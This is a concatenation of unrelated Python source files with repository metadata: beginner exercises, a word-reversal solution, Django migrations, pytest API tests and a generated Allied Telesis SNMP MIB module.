# Technically a string is legal, which is why it's a really bad
# idea, because it may cause the response to be returned
# character-by-character
assert_(not isinstance(iterator, str),
"You should not return a string as your application iterator, "
"instead return a single-item list containing that string.")
| [
"[email protected]"
]
| |
b51f457a805186eaa93adc2cc94cb037a560f42a | 9dba277eeb0d5e9d2ac75e2e17ab5b5eda100612 | /exercises/1901040058/1001S02E05_array.py.py | 9b79494c7bd80613fe0fbe7ad3d6749416df796a | []
| no_license | shen-huang/selfteaching-python-camp | e8410bfc06eca24ee2866c5d890fd063e9d4be89 | 459f90c9f09bd3a3df9e776fc64dfd64ac65f976 | refs/heads/master | 2022-05-02T05:39:08.932008 | 2022-03-17T07:56:30 | 2022-03-17T07:56:30 | 201,287,222 | 9 | 6 | null | 2019-08-08T15:34:26 | 2019-08-08T15:34:25 | null | UTF-8 | Python | false | false | 319 | py | array=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
array.reverse()
print(array)
str1=''.join('%s'%id for id in array)
print(str1)
str2=str1[2:8]
print(str2)
str3=str2[::-1]
print(str3)
int1=int(str3)
print(int1)
int2="{0:b}".format(int1)
print(int2)
int3="{0:o}".format(int1)
print(int3)
int4="{0:x}".format(int1)
print(int4)
| [
"[email protected]"
]
| |
1fe2794cabf63d91afdf446afb6eda5ac5eac6e6 | e305ea0e2b84b1cbb138e4443d13c915d7f467cd | /面试题58 - I翻转单词顺序.py | 063790615dc5a9a89d3f8b2617ae65f2da976cfb | []
| no_license | JoanWu5/jianzhi-offer | 770d7fd903779e3e530386705a9a513224a05539 | 580287d9bcf288d374b64b5a87c9921733a7a4f9 | refs/heads/master | 2022-10-11T10:36:51.837879 | 2020-06-06T08:59:16 | 2020-06-06T08:59:16 | 268,311,599 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 659 | py | class Solution(object):
def reverseWords(self, s):
"""
:type s: str
:rtype: str
"""
# s = s.strip().split()
# result = []
# for i in range(len(s)-1,-1,-1):
# if s[i] != ' ':
# result.append(s[i])
# return ' '.join(result)
result = []
s = s.strip()
i = j = len(s)-1
while i>=0:
while i>=0 and s[i]!=' ':
i-=1
result.append(s[i+1:j+1])
while s[i]== ' ':
i-=1
j=i
return ' '.join(result)
s = Solution()
print(s.reverseWords("a good example")) | [
"[email protected]"
]
| |
cdb3412b2336af2ceed7175b2fbeaf22845d0003 | e0ab9c21e51f0ac9d682b901957f2d1e2bc602ee | /product/migrations/0012_auto__del_field_product_has_cutting.py | 3fce9499662853a3018722261c7e9ae3e6714abb | []
| no_license | omago/web2print | bb36707932c76d24d07903fa9ee9c011f0d0d942 | 43bd1d9034e7d6d89457512f1aed376848b64f98 | refs/heads/master | 2021-07-15T09:00:59.389945 | 2016-11-05T21:12:54 | 2016-11-05T21:12:54 | 23,756,408 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 11,322 | py | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Product.has_cutting'
db.delete_column('product', 'has_cutting')
def backwards(self, orm):
# Adding field 'Product.has_cutting'
db.add_column('product', 'has_cutting',
self.gf('django.db.models.fields.BooleanField')(default=None),
keep_default=False)
models = {
u'flexion.flexion': {
'Meta': {'ordering': "['-pk']", 'object_name': 'Flexion', 'db_table': "'flexion'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
},
u'format.format': {
'Meta': {'ordering': "['-pk']", 'object_name': 'Format', 'db_table': "'format'"},
'height': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product_subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['product_subcategory.ProductSubcategory']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['user.User']", 'null': 'True', 'blank': 'True'}),
'user_format': ('django.db.models.fields.BooleanField', [], {}),
'width': ('django.db.models.fields.IntegerField', [], {})
},
u'paper.paper': {
'Meta': {'ordering': "['-pk']", 'object_name': 'Paper', 'db_table': "'paper'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'paper_finish': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['paper_finish.PaperFinish']", 'null': 'True', 'blank': 'True'}),
'paper_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['paper_type.PaperType']"}),
'paper_weight': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['paper_weight.PaperWeight']"}),
'price_per_kilogram': ('django.db.models.fields.DecimalField', [], {'max_digits': '11', 'decimal_places': '2'})
},
u'paper_finish.paperfinish': {
'Meta': {'ordering': "['-pk']", 'object_name': 'PaperFinish', 'db_table': "'paper_finish'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
},
u'paper_type.papertype': {
'Meta': {'ordering': "['-pk']", 'object_name': 'PaperType', 'db_table': "'paper_type'"},
'better_quality_paper': ('django.db.models.fields.BooleanField', [], {}),
'has_finish': ('django.db.models.fields.BooleanField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
},
u'paper_weight.paperweight': {
'Meta': {'ordering': "['-pk']", 'object_name': 'PaperWeight', 'db_table': "'paper_weight'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'weight': ('django.db.models.fields.IntegerField', [], {})
},
u'plastic.plastic': {
'Meta': {'ordering': "['-pk']", 'object_name': 'Plastic', 'db_table': "'plastic'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
},
u'press.press': {
'Meta': {'ordering': "['-pk']", 'object_name': 'Press', 'db_table': "'press'"},
'both_sides_print': ('django.db.models.fields.BooleanField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
},
u'product.product': {
'Meta': {'ordering': "['-pk']", 'object_name': 'Product', 'db_table': "'product'"},
'cover_paper': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['paper.Paper']", 'null': 'True', 'symmetrical': 'False'}),
'cover_plastic': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['plastic.Plastic']", 'null': 'True', 'symmetrical': 'False'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'flexion': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'product-flexion'", 'null': 'True', 'to': u"orm['flexion.Flexion']"}),
'formats': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'product-formats'", 'null': 'True', 'to': u"orm['format.Format']"}),
'has_cover': ('django.db.models.fields.BooleanField', [], {}),
'has_creasing': ('django.db.models.fields.BooleanField', [], {}),
'has_flexion': ('django.db.models.fields.BooleanField', [], {}),
'has_hole_drilling': ('django.db.models.fields.BooleanField', [], {}),
'has_improper_cutting': ('django.db.models.fields.BooleanField', [], {}),
'has_insert': ('django.db.models.fields.BooleanField', [], {}),
'has_laminating': ('django.db.models.fields.BooleanField', [], {}),
'has_mutations': ('django.db.models.fields.BooleanField', [], {}),
'has_plastic': ('django.db.models.fields.BooleanField', [], {}),
'has_rounding': ('django.db.models.fields.BooleanField', [], {}),
'has_title': ('django.db.models.fields.BooleanField', [], {}),
'has_vacuuming': ('django.db.models.fields.BooleanField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'insert_paper': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'product-insert-paper'", 'null': 'True', 'to': u"orm['paper.Paper']"}),
'meta_description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'meta_keywords': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'paper': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'paper'", 'null': 'True', 'to': u"orm['paper.Paper']"}),
'plastic': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'product-plastic'", 'null': 'True', 'to': u"orm['plastic.Plastic']"}),
'press': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['press.Press']", 'null': 'True', 'symmetrical': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128'}),
'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['product_subcategory.ProductSubcategory']"})
},
u'product_category.productcategory': {
'Meta': {'ordering': "['-pk']", 'object_name': 'ProductCategory', 'db_table': "'product_category'"},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'meta_description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'meta_keywords': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128'})
},
u'product_subcategory.productsubcategory': {
'Meta': {'ordering': "['-pk']", 'object_name': 'ProductSubcategory', 'db_table': "'product_subcategory'"},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['product_category.ProductCategory']"}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'meta_description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'meta_keywords': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128'})
},
u'user.user': {
'Meta': {'ordering': "['-pk']", 'object_name': 'User', 'db_table': "'user'"},
'activation_code': ('django.db.models.fields.CharField', [], {'max_length': '254', 'null': 'True', 'blank': 'True'}),
'address': ('django.db.models.fields.CharField', [], {'max_length': '254', 'null': 'True'}),
'click_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '11', 'decimal_places': '2', 'blank': 'True'}),
'company': ('django.db.models.fields.CharField', [], {'max_length': '254', 'null': 'True', 'blank': 'True'}),
'contact_person': ('django.db.models.fields.CharField', [], {'max_length': '254', 'null': 'True', 'blank': 'True'}),
'e_mail': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '254'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'oib': ('django.db.models.fields.CharField', [], {'max_length': '254'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '254', 'null': 'True', 'blank': 'True'}),
'reset_password_code': ('django.db.models.fields.CharField', [], {'max_length': '254', 'null': 'True', 'blank': 'True'}),
'reset_password_code_expiration': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'start_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '11', 'decimal_places': '2', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '254', 'db_index': 'True'})
}
}
complete_apps = ['product'] | [
"[email protected]"
]
| |
6c7782966748458a5b72ad96b769db9cf5d70920 | c9fcf2ff1acd16a423c47617145cde00cc1936aa | /tests/unit/api/test_task.py | eb114f77afdfcf11338986fe6f0b9774b96cf0bd | [
"MIT"
]
| permissive | JonathanAlcantara/fastlane | 766dd6701fcf172b6d7bb38983e19bd596cbf0d7 | dd923f0769281e94da98c4de39c57e3d447aeea3 | refs/heads/master | 2020-04-28T19:33:45.310622 | 2019-03-12T20:46:42 | 2019-03-12T20:46:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,027 | py | # Standard Library
from json import loads
from uuid import uuid4
# 3rd Party
import pytest
from preggy import expect
# Fastlane
from fastlane.models.task import Task
def test_get_tasks(client):
"""Test getting tasks"""
Task.create_task("my-task-1")
Task.create_task("my-task-2")
Task.create_task("my-task-3")
resp = client.get("/tasks/")
expect(resp.status_code).to_equal(200)
data = loads(resp.data)
expect(data["items"]).to_length(3)
expect(data["total"]).to_equal(3)
expect(data["page"]).to_equal(1)
expect(data["pages"]).to_equal(1)
expect(data["perPage"]).to_equal(3)
expect(data["hasNext"]).to_be_false()
expect(data["hasPrev"]).to_be_false()
def test_get_tasks2(client):
"""Test getting tasks returns CORS headers"""
resp = client.get("/tasks/")
expect(resp.status_code).to_equal(200)
headers = dict(resp.headers)
expect(headers).to_include("Access-Control-Allow-Origin")
expect(headers["Access-Control-Allow-Origin"]).to_equal("*")
def test_get_tasks3(client):
"""Test getting tasks returns CORS headers with custom origin"""
client.application.config["CORS_ORIGINS"] = "domain.com"
resp = client.get("/tasks/")
expect(resp.status_code).to_equal(200)
headers = dict(resp.headers)
expect(headers).to_include("Access-Control-Allow-Origin")
expect(headers["Access-Control-Allow-Origin"]).to_equal("*")
def test_get_tasks_data(client):
"""Test getting tasks resource data"""
task = Task.create_task("my-task")
resp = client.get("/tasks/")
data = loads(resp.data)
task_data = data["items"][0]
with client.application.app_context():
expect(task_data.keys()).to_equal(task.to_dict().keys())
def test_get_tasks_pagination(client):
"""Test getting tasks pagination"""
Task.create_task("my-task-1")
Task.create_task("my-task-2")
Task.create_task("my-task-3")
Task.create_task("my-task-4")
app = client.application
server_name = app.config["SERVER_NAME"]
resp = client.get("/tasks/?page=2")
data = loads(resp.data)
expect(data["total"]).to_equal(4)
expect(data["page"]).to_equal(2)
expect(data["hasNext"]).to_be_false()
expect(data["hasPrev"]).to_be_true()
expect(data["prevUrl"]).to_equal(f"http://{server_name}/tasks/?page=1")
expect(data["nextUrl"]).to_be_null()
def test_get_tasks_pagination2(client):
"""
Test getting tasks pagination should respond 400 when page is invalid
"""
resp1 = client.get("/tasks/?page=asdasdas")
expect(resp1.status_code).to_equal(400)
resp2 = client.get("/tasks/?page=1019021")
expect(resp2.status_code).to_equal(404)
resp3 = client.get("/tasks/?page=0")
expect(resp3.status_code).to_equal(400)
resp4 = client.get("/tasks/?page=-1")
expect(resp4.status_code).to_equal(400)
def test_get_task_details(client):
"""Test getting tasks"""
task_id = str(uuid4())
job_id = str(uuid4())
task = Task.create_task(task_id)
task.create_or_update_job(job_id, "ubuntu", "command")
resp = client.get(f"/tasks/{task_id}/")
expect(resp.status_code).to_equal(200)
data = loads(resp.data)
expect(data).to_include("jobs")
expect(data["jobs"]).to_length(1)
job_data = data["jobs"][0]
expect(job_data).to_include("id")
expect(job_data["id"]).to_equal(job_id)
expect(job_data["url"]).to_equal(
f"http://localhost:10000/tasks/{task_id}/jobs/{job_id}/"
)
def test_search_tasks1(client):
"""Tests search task by task_id."""
task_id = f"task-search-{str(uuid4())}"
Task.create_task(task_id)
Task.create_task(str(uuid4()))
Task.create_task(str(uuid4()))
resp = client.get("/search/?query=search")
expect(resp.status_code).to_equal(200)
data = loads(resp.data)
expect(data["items"]).to_length(1)
def test_search_tasks2(client):
"""
Test search tasks pagination should respond error when page is invalid
"""
resp1 = client.get("/search/?query=qwe&page=asdasdas")
expect(resp1.status_code).to_equal(400)
resp2 = client.get("/search/?query=qwe&page=1019021")
expect(resp2.status_code).to_equal(404)
resp3 = client.get("/search/?query=qwe&page=0")
expect(resp3.status_code).to_equal(400)
resp4 = client.get("/search/?query=qwe&page=-1")
expect(resp4.status_code).to_equal(400)
def test_job_details1(client):
"""Tests get job details returns proper details and last 20 execs."""
pytest.skip("Not implemented")
def test_job_stdout1(client):
"""Tests get job stdout returns log for last execution."""
pytest.skip("Not implemented")
def test_job_stdout2(client):
"""Tests get job stdout fails if invalid input."""
pytest.skip("Not implemented")
def test_job_stderr1(client):
"""Tests get job stderr returns log for last execution."""
pytest.skip("Not implemented")
def test_job_stderr2(client):
"""Tests get job stderr fails if invalid input."""
pytest.skip("Not implemented")
def test_job_logs1(client):
"""Tests get job logs returns log for last execution."""
pytest.skip("Not implemented")
def test_job_logs2(client):
"""Tests get job logs fails if invalid input."""
pytest.skip("Not implemented")
def test_stop_container1(client):
"""Tests that stopping a running container actually stops the container."""
pytest.skip("Not implemented")
def test_stop_container2(client):
"""Tests that stopping a scheduled job kills the scheduling."""
pytest.skip("Not implemented")
def test_stop_container3(client):
"""Tests that stopping a CRON job kills the scheduling."""
pytest.skip("Not implemented")
def test_stop_container4(client):
"""Tests that stopping without an end slash fails with 404."""
pytest.skip("Not implemented")
def test_stop_container5(client):
"""Tests that stopping a scheduled job with no executions actually kills the scheduled job."""
pytest.skip("Not implemented")
| [
"[email protected]"
]
| |
e2bcdd2563f558acd6fe945a5fb664ab81c64eea | 127e99fbdc4e04f90c0afc6f4d076cc3d7fdce06 | /2021_하반기 코테연습/boj22858.py | 655bd7eab90f926e09c88916a4e2769f02d0f280 | []
| no_license | holim0/Algo_Study | 54a6f10239368c6cf230b9f1273fe42caa97401c | ce734dcde091fa7f29b66dd3fb86d7a6109e8d9c | refs/heads/master | 2023-08-25T14:07:56.420288 | 2021-10-25T12:28:23 | 2021-10-25T12:28:23 | 276,076,057 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 333 | py | from collections import defaultdict
n, k = map(int, input().split())
answer = []
after_k = list(map(int, input().split()))
d = list(map(int, input().split()))
for _ in range(k):
tmp = [0] *n
for i in range(n):
tmp[d[i]-1] = after_k[i]
after_k = tmp
for i in range(n):
print(after_k[i],end=" ")
| [
"[email protected]"
]
| |
251820f0a584d8815135b3db62e5b44d48b87e58 | 4b5ee91dabf402522685cea452ba51c10dbb834e | /server/scrolls/migrations/0019_auto_20180608_1241.py | 0e839793ab7e8a2ddbc96b05321e94c0dee0d579 | []
| no_license | unscrollinc/unscroll | 8fb175d6cf9c2f91bdfc7a97a8da71beca7e702d | 88168af51abf8a0bfa06dcc22bd0ec11b671d989 | refs/heads/master | 2023-01-10T03:15:17.737493 | 2021-01-28T20:57:57 | 2021-01-28T20:57:57 | 196,251,483 | 7 | 0 | null | 2023-01-09T22:06:57 | 2019-07-10T17:52:37 | JavaScript | UTF-8 | Python | false | false | 381 | py | # Generated by Django 2.0.4 on 2018-06-08 12:41
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('scrolls', '0018_auto_20180608_0404'),
]
operations = [
migrations.AlterUniqueTogether(
name='event',
unique_together={('by_user', 'in_scroll', 'title', 'source_url')},
),
]
| [
"[email protected]"
]
| |
e13b598b3ab59e0ff74d9435e43e41c82855e572 | 5a4ab9ea5e3060bf7744853c0fa261af527876d6 | /day03/orm_demo1/boo/migrations/0002_article.py | 1d15706a8dcc361abb33ea0a575a577eafed267c | []
| no_license | gaohj/jxlg_0304 | 3cabe3bc56d6a3e0a97f25bc1b684da27e0a0b96 | 9e34dba2abcb752fff692b2c25adb3defd098a87 | refs/heads/master | 2020-06-02T23:34:02.489012 | 2019-06-28T08:58:56 | 2019-06-28T08:58:56 | 191,345,040 | 3 | 4 | null | null | null | null | UTF-8 | Python | false | false | 700 | py | # Generated by Django 2.0 on 2019-06-14 07:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('boo', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Article',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('title', models.CharField(max_length=100)),
('content', models.TextField()),
('pub_time', models.DateTimeField(auto_now_add=True)),
],
options={
'db_table': 'articles',
'ordering': ['pub_time'],
},
),
]
| [
"[email protected]"
]
| |
b364d718fc562acdadbf704f30576137acad4fb7 | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp/AT-SETUP-MIB.py | 886100562cc364dc65fb729e95027670ac0c8fde | [
"Apache-2.0"
]
| permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 11,116 | py | #
# PySNMP MIB module AT-SETUP-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/AT-SETUP-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 17:14:36 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsIntersection, ValueSizeConstraint, ConstraintsUnion, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsIntersection", "ValueSizeConstraint", "ConstraintsUnion", "ValueRangeConstraint")
modules, = mibBuilder.importSymbols("AT-SMI-MIB", "modules")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Bits, Unsigned32, MibIdentifier, ModuleIdentity, Counter32, TimeTicks, ObjectIdentity, Integer32, MibScalar, MibTable, MibTableRow, MibTableColumn, NotificationType, Gauge32, IpAddress, iso, Counter64 = mibBuilder.importSymbols("SNMPv2-SMI", "Bits", "Unsigned32", "MibIdentifier", "ModuleIdentity", "Counter32", "TimeTicks", "ObjectIdentity", "Integer32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "NotificationType", "Gauge32", "IpAddress", "iso", "Counter64")
TruthValue, DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "TruthValue", "DisplayString", "TextualConvention")
setup = ModuleIdentity((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500))
setup.setRevisions(('2013-10-14 00:00', '2012-09-21 00:00', '2010-11-20 00:00', '2010-10-08 00:00', '2010-09-10 00:00', '2010-09-08 00:00', '2010-06-15 00:15', '2010-04-09 00:00', '2008-10-02 00:00', '2008-09-30 00:00', '2008-09-24 00:00', '2008-05-21 00:00',))
if mibBuilder.loadTexts: setup.setLastUpdated('201310140000Z')
if mibBuilder.loadTexts: setup.setOrganization('Allied Telesis, Inc.')
class SystemFileOperationType(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))
namedValues = NamedValues(("idle", 1), ("success", 2), ("failure", 3), ("saving", 4), ("syncing", 5))
restartDevice = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: restartDevice.setStatus('deprecated')
restartStkMemberDevice = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 4), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: restartStkMemberDevice.setStatus('current')
firmware = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2))
currentFirmware = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 1))
currSoftVersion = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 1, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currSoftVersion.setStatus('current')
currSoftName = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currSoftName.setStatus('current')
currSoftSaveAs = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 1, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: currSoftSaveAs.setStatus('deprecated')
currSoftSaveToFile = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 1, 4), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: currSoftSaveToFile.setStatus('current')
currSoftSaveStatus = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 1, 5), SystemFileOperationType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currSoftSaveStatus.setStatus('current')
currSoftLastSaveResult = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currSoftLastSaveResult.setStatus('current')
nextBootFirmware = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 2))
nextBootVersion = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 2, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nextBootVersion.setStatus('current')
nextBootPath = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 2, 2), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nextBootPath.setStatus('current')
nextBootSetStatus = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 2, 3), SystemFileOperationType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nextBootSetStatus.setStatus('current')
nextBootLastSetResult = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 2, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nextBootLastSetResult.setStatus('current')
backupFirmware = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 3))
backupVersion = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 3, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: backupVersion.setStatus('current')
backupPath = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 3, 2), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: backupPath.setStatus('current')
backupSetStatus = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 3, 3), SystemFileOperationType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: backupSetStatus.setStatus('current')
backupLastSetResult = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 2, 3, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: backupLastSetResult.setStatus('current')
deviceConfiguration = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3))
runningConfig = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 1))
runCnfgSaveAs = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 1, 1), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: runCnfgSaveAs.setStatus('current')
runCnfgSaveAsStatus = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 1, 2), SystemFileOperationType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: runCnfgSaveAsStatus.setStatus('current')
runCnfgLastSaveResult = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: runCnfgLastSaveResult.setStatus('current')
nextBootConfig = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 2))
bootCnfgPath = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 2, 1), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: bootCnfgPath.setStatus('current')
bootCnfgExists = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 2, 2), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bootCnfgExists.setStatus('current')
bootCnfgSetStatus = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 2, 3), SystemFileOperationType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bootCnfgSetStatus.setStatus('current')
bootCnfgLastSetResult = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 2, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bootCnfgLastSetResult.setStatus('current')
defaultConfig = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 3))
dfltCnfgPath = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 3, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: dfltCnfgPath.setStatus('current')
